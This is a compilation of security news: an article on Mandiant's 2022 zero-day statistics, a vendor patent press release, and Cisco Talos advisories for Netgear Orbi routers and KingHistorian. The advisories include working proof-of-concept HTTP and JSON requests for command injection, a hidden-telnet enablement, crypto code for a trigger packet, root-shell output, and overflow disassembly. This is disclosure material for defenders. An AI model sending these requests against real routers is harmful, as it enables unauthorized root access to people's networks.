Nearly 20% of the zero-day flaws that attackers exploited in 2022 were in network, security, and IT management products, Mandiant says.

An analysis of data associated with zero-day attacks in 2022 suggests that threat actors are increasingly probing for security weaknesses in edge-infrastructure technologies, including VPNs, firewalls, and IT management products.

Researchers from Mandiant tracked a total of 55 zero-day vulnerabilities that adversaries exploited in various malicious campaigns last year and found that 10 of them involved an Internet-facing edge device.

Among them were CVE-2022-1040 and CVE-2022-3236 in Sophos firewalls, CVE-2022-20821 in Cisco IOS, CVE-2022-42474 and CVE-2022-41226 in Fortinet's FortiOS, CVE-2022-288810 in Zoho ManageEngine, and CVE-2022-35247 in SolarWinds Serv-u.

**Hunting on the Edge**

Casey Charrier, Mandiant senior analyst at Google Cloud, says adversaries are focusing on edge technologies likely because they perceive enterprise organizations as having fewer capabilities around endpoint detection and response (EDR) than they have around network monitoring.

"That's definitely an element that we assess is a focus of Chinese threat groups right now," Charrier says. "As more organizations integrate Internet of Things (IoT) devices into their environment, they'll need to take this into consideration when evaluating security tools and the security of these devices."

The 55 zero-days that Mandiant observed adversaries using in 2022 are fewer than the all-time high of 81 that its researchers observed in 2021. Even so, the number was nearly three times higher than the 20 zero-days Mandiant observed being exploited in 2020.

**Chinese Actors Continue to Be Most Active Exploiters of Zero-Days**

As has been the case for some time now, Chinese state-sponsored threat groups exploited more zero-days in 2022 than any other threat group. Of the 13 zero-days that Mandiant was able to identify as likely exploited by a state-backed group, seven — or more than half — involved a Chinese advanced persistent threat (APT) group.

One example is CVE-2022-30190, a vulnerability in the Microsoft Windows Support Diagnostic Tool that enables remote code execution (RCE) via malicious Office documents, even when a user might have disabled macros. Chinese threat actors used the vulnerability, also referred to as "Follina," in numerous threat campaigns throughout the year, making it one of the most heavily exploited flaws of 2022.

Several of the zero-days that Chinese state actors leveraged in attacks last year targeted network devices. One example is CVE-2022-42475, a buffer-overflow flaw in FortiOS SSL VPN technology that a China-based actor used in a campaign last year to deliver a highly customized tool for exploiting Fortinet's FortiGate firewalls. Another flaw in this category that a Chinese actor abused is CVE-2022-41328, a path traversal vulnerability in FortiOS. Mandiant observed a Chinese group identified as UNC3886 exploiting the vulnerability in a potential cyber-espionage campaign. The same actor was previously associated with an attack campaign targeting VMware ESXi hypervisors using a new technique with malicious vSphere Installation Bundles.

Mandiant said it also observed zero-day exploit activity involving North Korean threat actors ticking up slightly in 2022 compared with previous years. The two zero-days that Mandiant identified North Korean actors exploiting were: CVE-2022-0609, a Google Chrome vulnerability that a North Korean group exploited in a campaign targeting the high tech, media, and financial sectors, and CVE-2022-41128, an RCE in Windows Server that North Korea's APT37 exploited in a phishing campaign.

**Financially Motivated Cyberattackers Want in on the Action Too**

Financially motivated threat actors continued to be another set of adversaries that actively exploited zero-day vulnerabilities last year, though not to the same extent as in 2021. Of the 16 zero-days for which Mandiant was able to attribute a motive, four were used in financially motivated attacks. Many of these attacks involved ransomware deployments. Examples include CVE-2022-29499, an RCE flaw in a Mitel VoIP appliance that a threat actor used to deploy Lorenz ransomware, and CVE-2022-41091, i.e. a Windows Mark of the Web flaw that the operator of the Magniber ransomware used in one campaign.

Since 2019, zero-day exploit activity involving ransomware groups has been increasing, says Charrier. "This is the case for a variety of reasons," Charrier notes. "For one, ransomware, as a proportion of all financially motivated activity, has continued to grow and take over the criminal ecosystem. Second, it can be more obfuscated in terms of tracking the money as well as tracking any sort of victim payments."

Microsoft, Google, and Apple topped the charts — as they always have — in terms of the number of zero-day vulnerabilities in their respective products. The three vendors together accounted for 37 of the 55 zero-days that Mandiant tracked last year. Fifteen of the zero-days in operating systems affected Windows and nine out of 11 browser zero-days were in Google Chrome.

At the same time, the number of zero-days that threat actors found and exploited in other technologies grew as well. As zero-day numbers increase, so do the number of vendors that are victims, Charrier says: "While the top three targeted vendors remain consistent, the variety of additional targeted vendors generally continues to expand and vary each year."

Attackers Are Probing for Zero-Day Vulns in Edge Infrastructure Products

**SAN FRANCISCO****,** **March 21, 2023** **/PRNewswire/ --** Normalyze, a pioneering provider of cloud data security solutions, was granted the most fundamental patent to date for Data Security Posture Management (DSPM) by the U.S. Patent and Trademark Office. The patent addresses cloud data attack path detection based on security posture of the cloud environment and resource network path tracing. This patent is foundational for an emerging data-first approach to secure cloud-resident sensitive data and its implications will help to innovate the enterprise cybersecurity market at large.

Patent #11,575,696 describes how an accurate measure of cloud security posture enables the Normalyze DSPM platform to automatically trace network paths at scale between cloud-resident sensitive data and all points of access to determine attack paths. Paths are dynamically displayed to IT, security, and compliance teams, which instantly identify authorized versus unauthorized access – including propagation of breach attacks. Automated remediation workflows ensure continuous safety and compliance of the sensitive data. The Normalyze patent details how its technology, via integration, improves systems and methods of separate siloed tools such as cloud security posture management (CSPM), cloud infrastructure entitlement management (CIEM), cloud-native application protection platform (CNAPP), and/or cloud-native configuration management databases (CMDB).

"This patent's technology enables the Normalyze platform with 360-degree visibility of where our data resides across our cloud environments and any associated risks," said Rahul Gupta, Head of Information Security and GRC at Sigma Computing. "Normalyze's ability to connect the dots around data – including accesses, identities, vulnerabilities, and configurations – helps us understand where the real threats are and remediate them in near real-time. It is a game changer for securing our cloud environments."

"This patent is the first and the most important in the DSPM space. Its technology connects the risks to sensitive data in customer cloud environments, allowing them to focus on what matters most instead of chasing thousands of alerts generated by other siloed products," said Ravi Ithal, CTO and cofounder of Normalyze. "Getting the first major patent for an emerging new category such as DSPM shows our thought leadership in helping customers protect their most valuable asset, which is their data."

Read more detail about the patent from Ravi Ithal in this blog post. Normalyze has additional patents pending and will be announcing them in the first half of 2023.

The Normalyze platform is generally available in full functionality and supports all major IaaS and PaaS cloud services such as AWS, Google Cloud, Microsoft Azure and Snowflake.

**About Normalyze:**

Normalyze is a pioneering provider of cloud data security solutions helping customers secure their data, applications, identities, and infrastructure across public clouds. With Normalyze, organizations can discover and visualize their cloud data attack surface within minutes and get real-time visibility and control into their security posture, including access, configurations, and sensitive data to secure cloud infrastructures at scale. The Normalyze patented and agentless scanning platform continuously discovers resources, sensitive data and access paths across all cloud environments. The company was founded by industry veterans 

Ravi Ithal and Amer Deeba and has several customers, including Chargepoint, Corelight,

 Fairfield, Ginkgo Bio, Netskope, Sigma Computing and others. The company is funded by Lightspeed Venture Partners and Battery Ventures.

For more information, please visit normalyze.ai

SOURCE Normalyze

Normalyze Granted Patent for Data Security Posture Management (DSPM)

A command execution vulnerability exists in the access control functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the access control functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Router RBR750 4.6.8.5

**PRODUCT URLS**

Orbi Router RBR750 - https://www.netgear.com/support/product/RBR750

**CVSSv3 SCORE**

9.1 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

The access control functionality of the Orbi RBR750 allows a user to explicitly add devices (specified by MAC address and a hostname) to allow or block the specfied device when attempting to access the network. However, the dev_name parameter is vulnerable to command injection.

**Exploit Proof of Concept**

    POST /access_control_add.cgi?id=e7bbf8edbf4393c063a616d78bd04dfac332ca652029be9095c4b5b77f6203c1 HTTP/1.1
    Host: 10.0.0.1
    Content-Length: 104
    Authorization: Basic YWRtaW46UGFzc3cwcmQ=
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: yummy_magical_cookie=/; XSRF_TOKEN=2516336866
    Connection: close
    
    action=Apply&mac_addr=aabbccddeeaa&dev_name=test;ping${IFS}10.0.0.4&access_control_add_type=blocked_list
    

On the device itself, we can see this command now being executed.

       root@RBR750:/tmp# ps | grep ping
       21763 root      1336 S    ping 10.0.0.4
    

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-01-19 - Vendor Patch Release  
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-37337: TALOS-2022-1596 || Cisco Talos Intelligence Group

A cleartext transmission vulnerability exists in the Remote Management functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted man-in-the-middle attack can lead to a disclosure of sensitive information.

**SUMMARY**

A cleartext transmission vulnerability exists in the Remote Management functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted man-in-the-middle attack can lead to a disclosure of sensitive information.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Router RBR750 4.6.8.5

**PRODUCT URLS**

Orbi Router RBR750 - https://www.netgear.com/support/product/RBR750

**CVSSv3 SCORE**

6.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

**CWE**

CWE-311 - Missing Encryption of Sensitive Data

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

An option exists in the Web Services Management tool to “Always use HTTPS to access the router”. However, if a user browses to http://<router_ip>/ they are prompted for credentials before redirecting to HTTPS. In addition, the credentials must be valid in order for the redirect to proceed. Once redirected to HTTPS, the user is then prompted again for authentication, but this time over HTTPS.

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-01-19 - Vendor Patch Release  
2023-03-21 - Public Release

Discovered by Christopher McBee and Dave McDaniel of Cisco Talos.

CVE-2022-38458: TALOS-2022-1598 || Cisco Talos Intelligence Group

A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the ubus backend communications functionality of Netgear Orbi Satellite RBS750 4.6.8.5. A specially-crafted JSON object can lead to arbitrary command execution. An attacker can send a sequence of malicious packets to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Satellite RBS750 4.6.8.5

**PRODUCT URLS**

Orbi Satellite RBS750 - https://www.netgear.com/support/product/RBS750

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-912 - Hidden Functionality

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

Interprocess communications between the router and satellite are often handled using the OpenWRT ubus library. While this is normal, there is a hidden functionality built into the satellite device that allows an attacker with knowlege of the web GUI password (or knowledge of the default password if this was unchanged), to enable and subsequently log into a hidden telnet service.

The initial step in triggering this vulnerability is to get a session using the SHA256 sum of the password with the username ‘admin’:

    POST /ubus HTTP/1.1
    Host: 10.0.0.4
    Content-Length: 217
    Accept: application/json
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/json
    Origin: http://10.0.0.4
    Referer: http://10.0.0.4/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"method":"call","params":["00000000000000000000000000000000","session","login",{"username":"admin","password":"<SHA256 hash of password>","timeout":900}],"jsonrpc":"2.0","id":3}
    

This will return a ‘ubus\_rpc\_session’ token needed to start the hidden telnet service:

    HTTP/1.1 200 OK
    Content-Type: application/json
    Content-Length: 829
    Connection: close
    Date: Mon, 11 Jul 2022 19:27:03 GMT
    Server: lighttpd/1.4.45
    
    {"jsonrpc":"2.0","id":3,"result":[0,{"ubus_rpc_session":"e6c28cc8358cb9182daa29e01782df67","timeout":900,"expires":899,"acls":{"access-group":{"netgear":["read","write"],"unauthenticated":["read"]},"ubus":{"netgear.get":["pot_details","satellite_status","connected_device","get_language"],"netgear.log":["ntgrlog_status","log_boot_status","telnet_status","packet_capture_status","firmware_version","hop_count","cpu_load","ntgrlog_start","ntgrlog_stop","log_boot_enable","log_boot_disable","telnet_enable","telnet_disable","packet_capture_start","packet_capture_stop"],"netgear.set":["set_language"],"netgear.upgrade":["upgrade_status","upgrade_version","upgrade_start"],"session":["access","destroy","get","login"],"system":["info"],"uci":["*"]},"webui-io":{"download":["read"],"upload":["write"]}},"data":{"username":"admin"}}]}
    

Once this token is retrieved we simply need to add a parameter called ‘telnet\_enable’ to start the service:

    POST /ubus HTTP/1.1
    Host: 10.0.0.4
    Content-Length: 138
    Accept: application/json
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
    Content-Type: application/json
    Origin: http://10.0.0.4
    Referer: http://10.0.0.4/status.html
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"method":"call","params":["e6c28cc8358cb9182daa29e01782df67","netgear.log","telnet_enable","log_boot_enable",{}],"jsonrpc":"2.0","id":13}
    

**Exploit Proof of Concept**

Using the same password used earlier to generate the SHA256 hash with the username ‘admin’ will allow an attacker to log into the service:

    $ telnet 10.0.0.4
    Trying 10.0.0.4...
    Connected to 10.0.0.4.
    Escape character is '^]'.
    
    login: admin
    Password: === IMPORTANT ============================
     Use 'passwd' to set your login password
     this will disable telnet and enable SSH
    ------------------------------------------
    
    
    BusyBox v1.30.1 () built-in shell (ash)
    
         MM           NM                    MMMMMMM          M       M
       $MMMMM        MMMMM                MMMMMMMMMMM      MMM     MMM
      MMMMMMMM     MM MMMMM.              MMMMM:MMMMMM:   MMMM   MMMMM
    MMMM= MMMMMM  MMM   MMMM       MMMMM   MMMM  MMMMMM   MMMM  MMMMM'
    MMMM=  MMMMM MMMM    MM       MMMMM    MMMM    MMMM   MMMMNMMMMM
    MMMM=   MMMM  MMMMM          MMMMM     MMMM    MMMM   MMMMMMMM
    MMMM=   MMMM   MMMMMM       MMMMM      MMMM    MMMM   MMMMMMMMM
    MMMM=   MMMM     MMMMM,    NMMMMMMMM   MMMM    MMMM   MMMMMMMMMMM
    MMMM=   MMMM      MMMMMM   MMMMMMMM    MMMM    MMMM   MMMM  MMMMMM
    MMMM=   MMMM   MM    MMMM    MMMM      MMMM    MMMM   MMMM    MMMM
    MMMM$ ,MMMMM  MMMMM  MMMM    MMM       MMMM   MMMMM   MMMM    MMMM
      MMMMMMM:      MMMMMMM     M         MMMMMMMMMMMM  MMMMMMM MMMMMMM
        MMMMMM       MMMMN     M           MMMMMMMMM      MMMM    MMMM
         MMMM          M                    MMMMMMM        M       M
           M
     ---------------------------------------------------------------
       For those about to rock... (Chaos Calmer, rtm-4.6.8.5+r49254)
     ---------------------------------------------------------------
    root@RBS750:/# 
    

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-01-19 - Vendor Patch Release  
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-36429: TALOS-2022-1597 || Cisco Talos Intelligence Group

A command execution vulnerability exists in the hidden telnet service functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

A command execution vulnerability exists in the hidden telnet service functionality of Netgear Orbi Router RBR750 4.6.8.5. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Netgear Orbi Router RBR750 4.6.8.5

**PRODUCT URLS**

Orbi Router RBR750 - https://www.netgear.com/support/product/RBR750

**CVSSv3 SCORE**

7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-912 - Hidden Functionality

**DETAILS**

The Orbi Mesh Wi-Fi System creates dedicated high-speed Wi-Fi connections to your Internet service. The Orbi router (model RBR750) connects to your modem or gateway. The Orbi satellite (model RBS750) extends the Wi-Fi signal throughout your home.

Previous to recent hardware and software updates, the Netgear Orbi router series had a hidden debug page containing a toggle switch to enable the telnet service on the device http://<router ip>/debug.htm. However, recent updates have removed this switch and seemingly the ability to enable the service at all. While the switch in the GUI no longer functioned/was removed, enabling the service was still possible by sending a specially-crafted trigger packet to UDP port 23 (https://github.com/bkerler/netgear\_telnet). While recent updates have seemingly broken this tool (and the many tools like it), the service does still exist and is still triggerable.

The newer codebase uses a modified version of the Blowfish algorithm, which appears to be similar to older Nintendo DS cartridge protection code. Specifically the crypt_64bit_up/down functions with the constants 0x12, 0x112, 0x212, and 0x312 in the PoC below.

    def crypt_64bit_up(self, x, y):
        sbox = self.flattened_sBox
        pArray = self.flattened_pArray
        for i in range(0, 0x10):
            z = pArray[i] ^ x
            x = sbox[0x012 - 0x12 + ((z>>24)&0xff)];
            x = sbox[0x112 - 0x12 + ((z>>16)&0xff)] + x;
            x = sbox[0x212 - 0x12 + ((z>> 8)&0xff)] ^ x;
            x = (sbox[0x312 - 0x12+ ((z>> 0)&0xff)] + x) & 0xFFFFFFFF;
            x = y ^ x
            y = z
        x = x ^ pArray[-2]
        y = y ^ pArray[-1]
        return (x, y)
    
    def crypt_64bit_down(self, x, y):
        sbox = self.flattened_sBox
        pArray = self.flattened_pArray
        for i in range(0x11, 1, -1):
            z = pArray[i] ^ x
            x = sbox[0x012 - 0x12 + ((z>>24)&0xff)];
            x = sbox[0x112 - 0x12 + ((z>>16)&0xff)] + x;
            x = sbox[0x212 - 0x12 + ((z>> 8)&0xff)] ^ x;
            x = (sbox[0x312 - 0x12+ ((z>> 0)&0xff)] + x) & 0xFFFFFFFF;
            x = y ^ x
            y = z
        x = x ^ pArray[1]
        y = y ^ pArray[0]
        return (x, y) 
    

To trigger and enable this service, a username, password and MAC address of the target device’s br-lan interface are required.

**Exploit Proof of Concept**

    $ ./enable_telnet_poc.py
    Plaintext payload:
    00000000: 43 38 39 45 34 33 34 44  45 38 37 38 00 00 00 00  C89E434DE878....
    00000010: 61 64 6D 69 6E 00 00 00  00 00 00 00 00 00 00 00  admin...........
    00000020: 50 61 73 73 77 30 72 64  00 00 00 00 00 00 00 00  Passw0rd........
    00000030: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000040: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000050: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    00000060: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  ................
    Encrypted payload:
    00000000: D0 9C 30 F6 7D 98 82 EE  8F 14 65 9F B9 03 3C 8D  ..0.}.....e...<.
    00000010: D0 56 6C C4 13 EB 29 43  84 4B BB F5 B1 B0 C5 32  .Vl...)C.K.....2
    00000020: 63 CF 65 A2 BA 4F 87 8F  7C 82 89 28 32 95 7C 64  c.e..O..|..(2.|d
    00000030: 53 20 20 62 E2 F9 4B 3D  7C 82 89 28 32 95 7C 64  S  b..K=|..(2.|d
    00000040: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    00000050: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    00000060: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    00000070: 7C 82 89 28 32 95 7C 64  7C 82 89 28 32 95 7C 64  |..(2.|d|..(2.|d
    
    $ telnet 10.0.0.1
    Trying 10.0.0.1...
    Connected to 10.0.0.1.
    Escape character is '^]'.
     === LOGIN ===============================
      Please enter your account and password,
      It's the same with DUT GUI
     ------------------------------------------
    telnet account: admin
    telnet password:
    
    BusyBox v1.30.1 () built-in shell (ash)
    
      .oooooo.             .o8        o8o           .o.       ooooooo  ooooo
     d8P'  `Y8b           "888        `"'          .888.       `8888    d8'
    888      888 oooo d8b  888oooo.  oooo         .8"888.        Y888..8P
    888      888 `888""8P  d88' `88b `888        .8' `888.        `8888'
    888      888  888      888   888  888       .88ooo8888.      .8PY888.
    `88b    d88'  888      888   888  888      .8'     `888.    d8'  `888b
     `Y8bood8P'  d888b     `Y8bod8P' o888o    o88o     o8888o o888o  o88888o
    
     ---------------------------------------------------------------
       For those about to rock... (Chaos Calmer, 10.0.3440.3644)
     ---------------------------------------------------------------
    root@RBR750:/#
    

**TIMELINE**

2022-08-30 - Initial Vendor Contact  
2022-09-05 - Vendor Disclosure  
2023-03-21 - Public Release

Discovered by Dave McDaniel of Cisco Talos.

CVE-2022-38452: TALOS-2022-1595 || Cisco Talos Intelligence Group

Cisco Talos recently discovered four vulnerabilities in the Netgear Orbi mesh wireless system, including the main hub router and satellite routers that extend the network’s range.

Tuesday, March 21, 2023 13:03

_Christopher McBee and Dave McDaniel of Cisco Talos discovered these vulnerabilities._

Cisco Talos recently discovered four vulnerabilities in the Netgear Orbi mesh wireless system, including the main hub router and satellite routers that extend the network’s range.

A mesh system allows users to set up multiple access points to the Wi-Fi in their homes using various access points. Netgear’s Orbi system connects to the user’s modem or gateway and uses “satellites” to extend the Wi-Fi signal to different places throughout the home.

Talos discovered a vulnerability in the Orbi Satellite — TALOS-2022-1596 (CVE-2022-37337) — that could lead to arbitrary command execution on the device. The user needs to authenticate into the mesh system first, meaning they’d need to access an unprotected network or the login credentials of a password-protected network, for this attack to be successful. Then, the adversary needs to send a specially crafted HTTP request to trigger the vulnerability.

Two other issues, TALOS-2022-1595 (CVE-2022-38452) and TALOS-2022-1597 (CVE-2022-36429), exist in the main Orbi router that could also lead to arbitrary command execution if the adversary sends a specially crafted network request or JSON object, respectively.

TALOS-2022-1598 (CVE-2022-38458) also exists in the router. In this case, though, an adversary can carry out a man-in-the-middle attack to trick the service’s Web Services Management tool into disclosing sensitive information.

Cisco Talos worked with Netgear to ensure that TALOS-2022-1596, TALOS-2022-1597 and TALOS-2022-1598 are resolved and an update is available for affected customers. However, the company is still developing a patch for TALOS-2022-1595, though we are disclosing this vulnerability according to our 90-day timeline outlined in Cisco’s vulnerability disclosure policy.

Users are encouraged to update these affected products as soon as possible: Netgear Orbi Satellite RBS750, version 4.6.8.5. Talos tested and confirmed these versions of the Orbi system could be exploited by these vulnerabilities.

The following Snort rules will detect exploitation attempts against this vulnerability: 60474 – 60477 and 60499. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall Management Center or Snort.org.

Vulnerability Spotlight: Netgear Orbi router vulnerable to arbitrary command execution

If an adversary could capture an authentication packet, it contains all the necessary information to steal the target user’s username and password for the software.

Tuesday, March 21, 2023 09:03

_Carl Hurd of Cisco Talos discovered these vulnerabilities._

Cisco Talos recently discovered two vulnerabilities in WellinTech’s KingHistorian industrial control systems data manager.

KingHistorian is a time-series database that allows users to ingest and process large amounts of data from ICS, including built-in statistical analysis.

Talos discovered an information disclosure vulnerability (TALOS-2022-1683/CVE-2022-45124) in the software’s user authentication function. If an adversary could capture an authentication packet, it contains all the necessary information to steal the target user’s username and password for the software.

Another vulnerability, TALOS-2022-1674 (CVE-2022-43663) exists in a DLL in the software that could allow an adversary to cause a buffer overflow by sending a malicious packet to the targeted machine.

Cisco Talos worked with WellinTech to ensure that these issues are resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.

Users are encouraged to update these affected products as soon as possible: WellinTech KingHistorian, version 35.01.00.05. Talos tested and confirmed these versions of KingHistorian could be exploited by these vulnerabilities.

The following Snort rule will detect exploitation attempts against this vulnerability: 61093. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall Management Center or Snort.org.

Vulnerability Spotlight: WellinTech ICS platform vulnerable to information disclosure, buffer overflow vulnerabilities

An integer conversion vulnerability exists in the SORBAx64.dll RecvPacket functionality of WellinTech KingHistorian 35.01.00.05. A specially crafted network packet can lead to a buffer overflow. An attacker can send a malicious packet to trigger this vulnerability.

**SUMMARY**

An integer conversion vulnerability exists in the SORBAx64.dll RecvPacket functionality of WellinTech KingHistorian 35.01.00.05. A specially crafted network packet can lead to a buffer overflow. An attacker can send a malicious packet to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

WellinTech KingHistorian 35.01.00.05

**PRODUCT URLS**

KingHistorian - https://www.wellintech.com/product/kinghistorian

**CVSSv3 SCORE**

8.1 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-195 - Signed to Unsigned Conversion Error

**DETAILS**

KingHistorian is a time-series database used for ingesting and analyzing industrial control system data. KingHistorian is designed to be high performance and highly reliable for process data.

Within the RecvPacket functionality of SORBAx64.dll, an integer conversion issue exists that can lead to a buffer overflow. The assembly related to the conversion issue can be seen below.

    18002e81c  // 0x18002cd50 - SORBA::TcpTransceiver::Recv
    18002e81c  ff5028             call    qword [rax+0x28]
    18002e81f  85c0               test    eax, eax
    18002e821  // Check if recv successfully retrieved data
    18002e821  0f8566010000       jne     0x18002e98d
    18002e827  // Get the first byte of data
    18002e827  440fb69c24409000…movzx   r11d, byte [rsp+0x9040 {stack_recvBuffer}]
    18002e830  // sign extend the packet data size after the header (reported in header)
    18002e830  4863c7             movsxd  rax, edi
    18002e833  ba01000000         mov     edx, 0x1
    18002e838  48014328           add     qword [rbx+0x28 {SORBA::TransceiverInputStream::m_nRecvLength}], rax {SORBA::TransceiverInputStream::m_nRecvLength}
    18002e83c  410fb6c3           movzx   eax, r11b
    18002e840  41b904000000       mov     r9d, 0x4
    18002e846  2402               and     al, 0x2
    18002e848  3c02               cmp     al, 0x2                                                   [1]
    18002e84a  // First byte of recv buffer has 2 bit set
    18002e84a  410f44d1           cmove   edx, r9d  {0x4}                                           [2]
    18002e84e  8d42ff             lea     eax, [rdx-0x1]
    18002e851  83f803             cmp     eax, 0x3
    18002e854  770a               ja      0x18002e860
    18002e856  // offset into packet to find length
    18002e856  448b841441900000   mov     r8d, dword [rsp+rdx+0x9041 {var_fa17}]
    18002e85e  eb03               jmp     0x18002e863
    18002e863  418bc9             mov     ecx, r9d  {0x4}
    18002e866  bfffffffff         mov     edi, 0xffffffff
    18002e86b  2bca               sub     ecx, edx  // rcx = 0
    18002e86d  8bef               mov     ebp, edi  {0xffffffff}
    18002e86f  c1e103             shl     ecx, 0x3  // rcx = 0
    18002e872  d3ed               shr     ebp, cl  // rbp = 0xFFFF_FFFF
    18002e874  // rbp = packet_data & 0xFFFFFFFF (so no change to packet data)
    18002e874  4123e8             and     ebp, r8d
    18002e877  81fdecf90000       cmp     ebp, 0xf9ec                                               [3]
    18002e87d  // signed comparison of extracted length
    18002e87d  // This is an issue because this guard is here to protect lengths too large to 
    18002e87d  // fit in the buffer
    18002e87d  0f8f14ffffff       jg      0x18002e797
    ...
    18002e8b3  442bca             sub     r9d, edx                                                  [4]
    18002e8b6  418bc4             mov     eax, r12d
    18002e8b9  418bc9             mov     ecx, r9d
    18002e8bc  c1e103             shl     ecx, 0x3
    18002e8bf  48d3ef             shr     rdi, cl
    18002e8c2  4823f8             and     rdi, rax
    18002e8c5  41f6c301           test    r11b, 0x1                                                 [5]
    18002e8c9  7422               je      0x18002e8ed
    ...
    18002e8ed  8d441201           lea     eax, [rdx+rdx+0x1]
    18002e8f1  4c8bc7             mov     r8, rdi
    18002e8f4  4863c8             movsxd  rcx, eax
    18002e8f7  488d940c40900000   lea     rdx, [rsp+rcx+0x9040] {var_18a58}
    18002e8ff  498bca             mov     rcx, r10
    18002e902  e82f150000         call    memcpy                                                    [6]
    

At [1] a flag is extracted from the received packet that is used to determine how large the size field is later in the packet: if the second bit is set in the first byte, then the size field is 4 bytes, which is seen at [2]. Using this size field, some shifting is done to properly extract the size field from the packet for all possible values (only 1 or 4 in this code base). The main issue occurs at [3], where the size is extracted by AND’ing the packet data with 0xFFFFFFFF. If the packet data contains a value greater than 0x80000000, then the signed comparison will pass. It is then used to determine if the allocated stack buffer is large enough to hold all the data. The buffer is statically sized at 0xfa00 bytes. At [4] and [5] the same feature extraction is used to grab the size field again, but at [5] a different flag is checked, this one corresponding to if the payload is compressed or not. Regardless of if the packet is compressed, a multitude of bugs will occur. One such instance is at [6], where the extracted value is used directly as the size of memcpy, which can result in a buffer overflow.

**TIMELINE**

2022-12-16 - Initial Vendor Contact  
2022-12-22 - Vendor Disclosure  
2022-12-22 - Initial Vendor Contact  
2023-03-17 - Vendor Patch Release  
2023-03-20 - Public Release

Discovered by Carl Hurd of Cisco Talos.

CVE-2022-43663: TALOS-2022-1674 || Cisco Talos Intelligence Group

